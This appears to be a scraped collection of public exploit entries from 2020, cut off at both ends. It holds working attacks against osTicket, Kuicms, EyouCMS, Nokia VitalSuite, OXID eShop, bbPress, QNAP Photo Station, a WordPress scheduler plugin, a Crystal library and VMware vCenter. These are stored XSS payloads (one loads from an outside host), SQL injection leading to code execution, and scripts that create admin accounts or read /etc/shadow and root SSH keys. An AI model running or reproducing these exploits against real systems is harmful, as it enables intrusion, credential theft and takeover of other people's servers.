icket+Number&exports%5Bcreated%5D%5Bname%5D=Date+Created&exports%5Bcreated%5D%5Bheading%5D=Date+Created&exports%5Bcdata__subject%5D%5Bname%5D=Subject&exports%5Bcdata__subject%5D%5Bheading%5D=Subject&exports%5Buser__name%5D%5Bname%5D=From&exports%5Buser__name%5D%5Bheading%5D=From&exports%5Buser__emails__address%5D%5Bname%5D=From+Email&exports%5Buser__emails__address%5D%5Bheading%5D=From+Email&exports%5Bcdata__priority%5D%5Bname%5D=Priority&exports%5Bcdata__priority%5D%5Bheading%5D=Priority&exports%5Bdept_id%5D%5Bname%5D=Department&exports%5Bdept_id%5D%5Bheading%5D=Department&exports%5Btopic_id%5D%5Bname%5D=Help+Topic&exports%5Btopic_id%5D%5Bheading%5D=Help+Topic&exports%5Bsource%5D%5Bname%5D=Source&exports%5Bsource%5D%5Bheading%5D=Source&exports%5Bstatus__id%5D%5Bname%5D=Current+Status&exports%5Bstatus__id%5D%5Bheading%5D=Current+Status&exports%5Blastupdate%5D%5Bname%5D=Last+Updated&exports%5Blastupdate%5D%5Bheading%5D=Last+Updated&exports%5Best_duedate%5D%5Bname%5D=SLA+Due+Date&exports%5Best_duedate%5D%5Bheading%5D=SLA+Due+Date&exports%5Bduedate%5D%5Bname%5D=Due+Date&exports%5Bduedate%5D%5Bheading%5D=Due+Date&exports%5Bclosed%5D%5Bname%5D=Closed+Date&exports%5Bclosed%5D%5Bheading%5D=Closed+Date&exports%5Bisoverdue%5D%5Bname%5D=Overdue&exports%5Bisoverdue%5D%5Bheading%5D=Overdue&exports%5Bmerged%5D%5Bname%5D=Merged&exports%5Bmerged%5D%5Bheading%5D=Merged&exports%5Blinked%5D%5Bname%5D=Linked&exports%5Blinked%5D%5Bheading%5D=Linked&exports%5Bisanswered%5D%5Bname%5D=Answered&exports%5Bisanswered%5D%5Bheading%5D=Answered&exports%5Bstaff_id%5D%5Bname%5D=Agent+Assigned&exports%5Bstaff_id%5D%5Bheading%5D=Agent+Assigned&exports%5Bteam_id%5D%5Bname%5D=Team+Assigned&exports%5Bteam_id%5D%5Bheading%5D=Team+Assigned&exports%5Bthread_count%5D%5Bname%5D=Thread+Count&exports%5Bthread_count%5D%5Bheading%5D=Thread+Count&exports%5Breopen_count%5D%5Bname%5D=Reopen+Count&exports%5Breopen_count%5D%5Bheading%5D=Reopen+Count&exports%5Battachment_count%5D%5Bname%5D=Attachment+Count&exports%5Battachment_count%5D%5Bheading%5D=Attachment+Count&exports%5Btask_count%5D%5Bname%5D=Task+Count&exports%5Btask_count%5D%5Bheading%5D=Task+Count&new-field=&submit=Create

3月5日3月5日

# Exploit Title: osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting # Date: 2020-06-26 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://osticket.com # Patch Link: https://github.com/osTicket/osTicket/commit/d54cca0b265128f119b6c398575175cb10cf1754 # Version: osTicket 1.14.1 # Tested on: CentOS 7 (1908) # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists within the 'Saved Searches' functionality of osTicket. # Vulnerable Parameter : queue-name # POC # Exploit Details : The following request will create a personal queue with an XSS payload as the queue name. POST /os-ticket/scp/ajax.php/tickets/search/save HTTP/1.1 Host: TARGET Content-Length: 2407 Accept: */* X-CSRFToken: 4c0cfe1d90018bd1521d4c6236ff9e695695feb4 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://TARGET Referer: http://TARGET/os-ticket/scp/tickets.php?queue=1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: OSTSESSID=1bgg4patkgh75amtk7i40ijg0r Connection: close id=&parent_id=1&a=search&fields%5B%5D=status__id&fields%5B%5D=status__state&fields%5B%5D=dept_id&fields%5B%5D=assignee&fields%5B%5D=topic_id&fields%5B%5D=created&fields%5B%5D=est_duedate&fields%5B%5D=duedate&6e726d7c5d6739=&bb1ed81f8d0d5b%5B%5D=includes&_field-checkboxes%5B%5D=1248906005&5a14e85b6ad733%5B%5D=includes&64e882412ea044%5B%5D=open&3387e761db951b%5B%5D=includes&fae2c0ad94312b%5B%5D=assigned&8b25367208a92c%5B%5D=set&4548de579d61b2%5B%5D=set&6b0942ccd352fb=&7508c012d200c3=&306afd69a94f37=&2cb42ece11fe18=&19178654ae1019=&5446ab541e9cbe=&643b959c89a939%5B%5D=&c41f997e500bde=&594ae09ae9b23b%5B%5D=d&f67d51537548ed=&782f1a2f64f6b8%5B%5D=d&bf54f7c4c9cd85=&d53f6d5fa7c165%5B%5D=d&dda4c3a3983e11=&3edd5b8c560cb0%5B%5D=d&5d54602e649846%5B%5D=set&eee448b2f6bd17=&c66cc8358c9461=&1c2df7cbee73a8=&2b12655056e4bc=&559ec54e5d4f4d=&4d653aa4c6fbfe=&fde625f821b1cc%5B%5D=&1d3ec7f5059a1e=&fd5c9e3beeb866%5B%5D=d&f9d70eb7b32ef7=&4e236864d83b1b%5B%5D=d&6ad52c19a211f8=&17d6ed14edc097%5B%5D=d&1ed604fc8adb80=&29187a3432e23b%5B%5D=d&6a2107ce7bc3ad%5B%5D=set&968398f30ae34d=&1bd5961978d6f5=&aaead453b69fd8=&b2473437455577=&2d7ade2446d29d=&7248fe732f4071=&9d29b71605e863%5B%5D=&606b27533da5da=&042dae34bbf5f6%5B%5D=d&69e461f3457905=&9cb82bf3b3b655%5B%5D=d&472a67a44bfd63=&387c6a57919904%5B%5D=d&b13a3742f14f6a=&285dc00ac07d30%5B%5D=d&new-field=&inherit-columns=on&columns%5B1%5D%5Bcolumn_id%5D=1&columns%5B1%5D%5Bheading%5D=Ticket&columns%5B1%5D%5Bwidth%5D=100&columns%5B1%5D%5Bname%5D=Ticket+%23&columns%5B1%5D%5Bsortable%5D=on&columns%5B10%5D%5Bcolumn_id%5D=10&columns%5B10%5D%5Bheading%5D=Last+Updated&columns%5B10%5D%5Bwidth%5D=150&columns%5B10%5D%5Bname%5D=Last+Updated&columns%5B10%5D%5Bsortable%5D=on&columns%5B3%5D%5Bcolumn_id%5D=3&columns%5B3%5D%5Bheading%5D=Subject&columns%5B3%5D%5Bwidth%5D=300&columns%5B3%5D%5Bname%5D=Subject&columns%5B3%5D%5Bsortable%5D=on&columns%5B4%5D%5Bcolumn_id%5D=4&columns%5B4%5D%5Bheading%5D=From&columns%5B4%5D%5Bwidth%5D=185&columns%5B4%5D%5Bname%5D=User+Name&columns%5B4%5D%5Bsortable%5D=on&columns%5B5%5D%5Bcolumn_id%5D=5&columns%5B5%5D%5Bheading%5D=Priority&columns%5B5%5D%5Bwidth%5D=85&columns%5B5%5D%5Bname%5D=Priority&columns%5B5%5D%5Bsortable%5D=on&columns%5B8%5D%5Bcolumn_id%5D=8&columns%5B8%5D%5Bheading%5D=Assigned+To&columns%5B8%5D%5Bwidth%5D=160&columns%5B8%5D%5Bname%5D=Assignee&columns%5B8%5D%5Bsortable%5D=on&queue-name=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E

3月5日3月5日

# Exploit Title: Kuicms Php EE 2.0 - Persistent Cross-Site Scripting # Date: 2020-05-27 # Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. # Vendor Homepage: https://kuicms.com # Software Link: https://kuicms.com/kuicms.zip # Version: Kuicms Php EE 2.0 # Tested on: Windows # CVE : N/A Vulnerable Request: POST /web/?c=bbs&a=reply&id=1 HTTP/1.1 Host: 172.16.166.137 Content-Length: 56 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://172.16.166.137 Referer: http://172.16.166.137/web/?m=bbsshow&id=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=vpj3jduhoqlfieqhcnlilck2s6 Connection: close content=</div>test<img src=//xsshs.cn/8jhh/xss.jpg><div>

3月5日3月5日

# Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection # Exploit Author: Berk Dusunur # Google Dork: N/A # Type: Web App # Date: 2020-05-28 # Vendor Homepage: https://www.nokia.com # Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/ # Affected Version: v2020 # Tested on: MacosX # CVE : N/A # PoC POST /cgi-bin/vsloginadmin.exe HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Connection: keep-alive Accept: / Accept-Encoding: gzip,deflate Content-Length: 84 Host: berklocal User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Password=test&Submit=%20Login%20&UserName=SQL-INJECTION&mode=1 Example Time-Based payload UserName=test'; waitfor delay '00:00:10' --

3月5日3月5日

# Exploit Title: OXID eShop 6.3.4 - 'sorting' SQL Injection # Date: 2019-07-29 # Exploit Author: VulnSpy # Vendor Homepage: https://www.oxid-esales.com/ # Software Link: https://github.com/OXID-eSales/oxideshop_ce # Version: Versions 6.x (prior to 6.3.4) # Tested on: https://github.com/vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc # CVE: 1. Click on any product item in the web page ```bash e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html ``` 2..Add `sorting` parameter after the URL of item detail ( Insert PHP code to database via SQL injection ) ```bash e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert into oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION) VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 0x434d53464f4c4445525f55534552494e464f, 0x00);%23 ``` 3.Accessing the following links triggers PHP code execution and will display the PHPINFO page if exploited successfully. ```bash http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo ``` Ref: * https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/ * https://blog.ripstech.com/2019/oxid-esales-shop-software/ * https://bugs.oxid-esales.com/view.php?id=7002

3月5日3月5日

# Exploit Title: Online-Exam-System 2015 - 'fid' SQL Injection # Exploit Author: Berk Dusunur # Google Dork: N/A # Type: Web App # Date: 2020-05-28 # Vendor Homepage: https://github.com/sunnygkp10/ # Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git # Affected Version: 2015 # Tested on: MacosX # CVE : N/A # PoC Affected code <?php if(@$_GET['fid']) { echo '<br />'; $id=@$_GET['fid']; $result = mysqli_query($con,"SELECT * FROM feedback WHERE id='$id' ") or die('Error'); http://berklocal/dash.php?fid=SQL-INJECTION

3月5日3月5日

# Exploit Title: EyouCMS 1.4.6 - Persistent Cross-Site Scripting # Date: 2020-05-28 # Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. # Vendor Homepage: https://eyoucms.com # Software Link: https://qiniu.eyoucms.com/EyouCMS-V1.4.6-UTF8-SP2.zip # Version: EyouCMS V1.4.6 # Tested on: Windows # CVE : N/A Vulnerable Request: POST /EyouCMS/index.php?m=user&c=UsersRelease&a=article_add HTTP/1.1 Host: 192.168.31.244 Content-Length: 131 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.31.244 Referer: http://192.168.31.244/EyouCMS/index.php?m=user&c=UsersRelease&a=article_add Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: users_id=4; home_lang=cn; admin_lang=cn; PHPSESSID=mahba3d6smn8d400pedi9n9gl0; referurl=http%3A%2F%2F192.168.31.244%2FEyouCMS%2Findex.php Connection: close title=test&typeid=9&tags=&litpic_inpiut=&addonFieldExt%5Bcontent%5D=111<img src=1 onerror=alert(document.cookie)>&__token__=b90d4bf2356b81f65284238857b91ada 王新峰技术管理部中国银行保险信息技术管理有限公司

3月5日3月5日

# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation # Date: 2020-05-29 # Exploit Author: Raphael Karger # Software Link: https://codex.bbpress.org/releases/ # Version: BBPress < 2.5 # CVE: CVE-2020-13693 import argparse import requests import bs4 import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) useragent = {"User-Agent" : "This is a real browser i swear"} def grab_nonce_login_page(url): try: login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent) soup = bs4.BeautifulSoup(login_page_request.text, "lxml") action = soup.find("form", class_="bbp-login-form") wp_login_page = action.get("action") wp_nonce = action.find("input", id="_wpnonce").get("value") return (wp_nonce, wp_login_page) except Exception as nonce_error: print("[-] Nonce Error: '{}'".format(nonce_error)) return False def exploit(url, username, password, email): info = grab_nonce_login_page(url) if info: nonce = info[0] login_page = info[1] try: return requests.post(login_page, data={ "user_login" : username, "user_pass" : password, "user_email" : email, "user-submit" : "", "user-cookie" : "1", "_wpnonce" : nonce, "bbp-forums-role" : "bbp_keymaster" }, allow_redirects=False, verify=False, timeout=10, headers=useragent) except Exception as e: print("[-] Error Making Signup Post Request: '{}'".format(e)) return False if __name__ == "__main__": exit("asdasd") parser = argparse.ArgumentParser() parser.add_argument("-n", "--username", dest="username", help="Username of Newly Created Keymaster", default="raphaelrocks") parser.add_argument("-p", "--password", dest="password", help="Password of Newly Created Keymaster", default="raphael123") parser.add_argument("-e", "--email", dest="email", help="Email of Newly Created Keymaster", default="[email protected]") parser.add_argument("-u", "--url", dest="url", help="URL of Page With Exposed Register Page.", required=True) args = parser.parse_args() site_exploit = exploit(args.url, args.username, args.password, args.email) if site_exploit and site_exploit.status_code == 302: exit("[+] Exploit Successful, Use Username: '{}' and Password: '{}'".format(args.username, args.password)) print("[-] Exploit Failed")

3月5日3月5日

# Exploit Title: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution # Exploit Author: Yunus YILDIRIM (Th3Gundy) # Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com # Date: 2020-05-28 # Vendor Homepage: https://www.qnap.com # Version: QTS < 4.4.1 | Photo Station < 6.0.3 # CVE: CVE-2019-7192, CVE-2019-7193, CVE-2019-7194, CVE-2019-7195 # References: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit # References: https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e # References: https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 ###################################################################### ###################################################################### #!/usr/bin/python3 __author__ = "Yunus YILDIRIM (@Th3Gundy)" __version__ = "0.1" import requests import re, sys # hide ssl error from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def get_banner(): print("""\033[91m █████ ███▄ █ ▄▄▄ ██▓███ ▒██▓ ██▒ ██ ▀█ █ ▒████▄ ▓██░ ██▒ ▒██▒ ██░▓██ ▀█ ██▒▒██ ▀█▄ ▓██░ ██▓▒ ░██ █▀ ░▓██▒ ▐▌██▒░██▄▄▄▄██ ▒██▄█▓▒ ▒ ░▒███▒█▄ ▒██░ ▓██░ ▓█ ▓██▒▒██▒ ░ ░ ░░ ▒▒░ ▒ ░ ▒░ ▒ ▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ ░ ▒░ ░ ░ ░░ ░ ▒░ ▒ ▒▒ ░░▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ \033[0m \033[94m {0} \033[0m """.format(__author__)) def get_file_content(file): post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file} file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10) print("="*65) ; print("{0} file content;\n{1}" .format(file,file_read_response.text)) # print banner get_banner() if len(sys.argv) != 2: print("\033[93mUsage : python3 gundy.py https://vulnerable_url:port\033[0m") sys.exit(-1) url = sys.argv[1].rstrip('/') headers = {"User-Agent": "Gundy - QNAP RCE"} # for session cookie req = requests.Session() ####################################################################### # search album_id print("="*65) post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'} album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10) if album_id_response.status_code != 200: print("album id not found \n\033[91mnot vulnerable\033[0m") sys.exit(0) album_id = re.search('(?<=<output>).*?(?=</output>)', album_id_response.text).group() print("album_id ==> " + album_id) ####################################################################### # search $_SESSION['access_code'] access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10) if access_code_response.status_code != 200: print("slideshow not found \n\033[91mnot vulnerable\033[0m") sys.exit(0) access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group() print("access_code ==> " + access_code) ####################################################################### # /etc/passwd file read get_file_content('./../../../../../etc/passwd') # /etc/shadow read get_file_content('./../../../../../etc/shadow') # /etc/hostname read get_file_content('./../../../../../etc/hostname') # /root/.ssh/id_rsa read get_file_content('./../../../../../root/.ssh/id_rsa') #######################################################################

3月5日3月5日

# Exploit Title: WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User) # Google Dork: N/A # Date: 2020-05-21 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://www.bdtask.com/ # Software Link: https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip # Category: Web Application # Version: 1.0.0 # Tested on: CentOS 7 / WordPress 5.4.1 # CVE : N/A # 1. Technical Description: The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability in the forms it presents, allowing the possibility of deleting records (users) when an ID is known. # 2. Proof of Concept (PoC): <html> <form method="POST" action="http://[TARGET]/wp-admin/admin.php?page=msbdt_professional"> <input type="hidden" value="[ID]" name="pro_delete_id"><br> <input type="hidden" value="Delete" name="professional_delete"> <input type="submit" value="Delete user"> </form> </html>

3月5日3月5日

# Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass # Exploit Author : Halis Duraki (@0xduraki) # Date : 2020-05-28 # Product : http-protection (Crystal Shard) # Product URI : https://github.com/rogeriozambon/http-protection # Version : http-protection <= 0.2.0 # CVE : N/A ## About the product This library/shard (http-protection) protects against typical web attacks with-in Crystal applications. It was inspired by rack-protection Ruby gem. It is an open-source product developed by Rogério Zambon in Brazil. The total number of installs and respective usage is not known (no available information), but the Shard get the traction on Crystal official channels (Crystals' ANN, Gitter, and Shardbox). ## About the exploit The `IpSpoofing` middleware detects spoofing attacks (and likewise, should prevent it). Both of this functionalities can be bypassed by enumerating and hardcoding `X-*` header values. The middleware works by detecting difference between IP addr values of `X-Forwarded-For` & `X-Real-IP/X-Client-IP`. If the values mismatch, the middleware protects the application by forcing `403 (Forbidden)` response. Relevant code (src/http-protection/ip_spoofing.cr): ``` module HTTP::Protection class IpSpoofing ... def call(... ctx) ... ips = headers["X-Forwarded-For"].split(/\s*,\s*/) return forbidden(context) if headers.has_key?("X-Client-IP") && !ips.includes?(headers["X-Client-IP"]) return forbidden(context) if headers.has_key?("X-Real-IP") && !ips.includes?(headers["X-Real-IP"]) ... end end end ``` The exploit works by hardcoding the values in all protection request headers following the same const IP Address. The standard format for `X-Forwarded-For` from MDN reference those values as: `X-Forwarded-For: <client>, <proxy1>, <proxy2>`. HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls. @see CWE-16: https://cwe.mitre.org/data/definitions/16.html ## PoC (Proof of Concept) * Set a breakpoint on the request, or intercept request. * Hardcore all three request headers: * X-Forwarded-For: 123.123.123.123 * X-Client-IP: 123.123.123.123 * X-Real-IP: 123.123.123.123 * Continue request. * Response should be 200 OK, otherwise, 400 Forbidden. ++ Request example (POC): ``` GET / HTTP/1.1 Host: localhost.:8081 X-Forwarded-For: 123.123.123.123 X-Client-IP: 123.123.123.123 X-Real-IP: 123.123.123.123 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache ``` ++ Response (POC): ``` 200 OK ```` ## Fix It is advised to fix the IpSpoofing detection via checking socket data directly instead of relying on passed header key/vals. The other solution is to force proxy to dismiss such data (on request) and use original source (proxified). ============================================================================================================== + Halis Duraki | [email protected] | @0xduraki | https://duraki.github.io ==============================================================================================================

3月5日3月5日

# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass # Date: 2020-06-01 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html # Version: vCenter Server 6.7 before update 3f # Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) # CVE: CVE-2020-3952 #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 File name CVE-2020-3592.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: exploit + vulnerability checker ''' import binascii, socket, sys, string, random ## Default vars; change at will _sIP = '192.168.50.35' _iPORT = 389 _iTIMEOUT = 5 def randomString(iStringLength=8): #sLetters = string.ascii_lowercase sLetters = string.ascii_letters return ''.join(random.choice(sLetters) for i in range(iStringLength)) def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed sReturn = sPrefix if (len(sData) / 2 ) > 255: sReturn += b'82' hexBytes = 2 elif (len(sData) /2 ) >= 128: sReturn += b'81' sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() return sReturn def buildBindRequestPacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) ## Packet Construction sPacket = getLengthPrefix(sPass, b'80') + sPass sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket sPacket = b'020103' + sPacket sPacket = getLengthPrefix(sPacket, b'60') + sPacket sPacket = b'020101' + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildUserCreatePacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) def createAttribute(sName, sValue): sValue = getLengthPrefix(sValue, b'04') + sValue sName = getLengthPrefix(sName, b'04') + sName sReturn = getLengthPrefix(sValue, b'31') + sValue sReturn = sName + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn def createObjectClass(): sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') sReturn = getLengthPrefix(sReturn, b'31') + sReturn sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn ## Attributes sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) sAttributes += createObjectClass() sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) ## CN sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') sUserEntry = getLengthPrefix(sCN, b'04') + sCN ## Packet Assembly (bottom up) sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes sPacket = sUserEntry + sPacket sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildModifyUserPacket(sUser): sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') sMember = binascii.hexlify(b'member') ## Packet Construction sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN sPacket = getLengthPrefix(sPacket, b'31') + sPacket sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def performBind(s): ## Trying to bind, fails, but necessary (even fails when using correct credentials) dPacket = buildBindRequestPacket('[email protected]','www.IC4.be') s.send(dPacket) sResponse = s.recv(1024) try: sResponse = sResponse.split(b'\x04\x00')[0][-1:] sCode = binascii.hexlify(sResponse).decode() if sCode == '31': print('[+] Ok, service reachable, continuing') else: print('[-] Something went wrong') except: pass return sCode def performUserAdd(s, sUser, sPass): dPacket = buildUserCreatePacket(sUser,sPass) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) elif sCode == b'\x32': print('[-] Error, this host is not vulnerable (insufficientAccessRights)') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() print('[-] Error, user not added, message received: ' + sMessage) except: pass return sCode def performUserMod(s, sUser, verbose = True): dPacket = buildModifyUserPacket(sUser) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': if verbose: print('[+] User modification success (if the above is OK).') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() if verbose: print('[-] Error during modification, message received: ' + sMessage) except: pass return sCode, sMessage def performUnbind(s): try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') except: pass def main(): global _sIP, _iPORT, _iTIMEOUT _sUSER = 'user_' + randomString(6) _sPASS = randomString(8) + '_2020' bAdduser = False if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) print(' Leave username & password empty for a vulnerability check') print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') print(' But for now, I will ask questions') sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') if not sAnswer == '': _sIP = sAnswer sAnswer = input('[?] Want to perform a check only? [Y/n]: ') if sAnswer.lower() == 'n': bAdduser = True if bAdduser: sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') if not sAnswer == '': _sUSER = sAnswer sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') if not sAnswer == '': _sPASS = sAnswer else: _sIP = sys.argv[1] if len(sys.argv) >= 3: _sUSER = sys.argv[2] bAdduser = True if len(sys.argv) >= 4: _sPASS = sys.argv[3] ## MAIN print('') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(_iTIMEOUT) try: s.connect((_sIP,_iPORT)) except: print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') sys.exit(1) performBind(s) if bAdduser: sCode = performUserAdd(s, _sUSER, _sPASS) if not bAdduser: print('[!] Checking vulnerability') sCode, sMessage = performUserMod(s, 'Administrator', False) if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) else: print('[+] This host is vulnerable!') else: sCode = performUserMod(s, _sUSER) performUnbind(s) s.close() if __name__ == 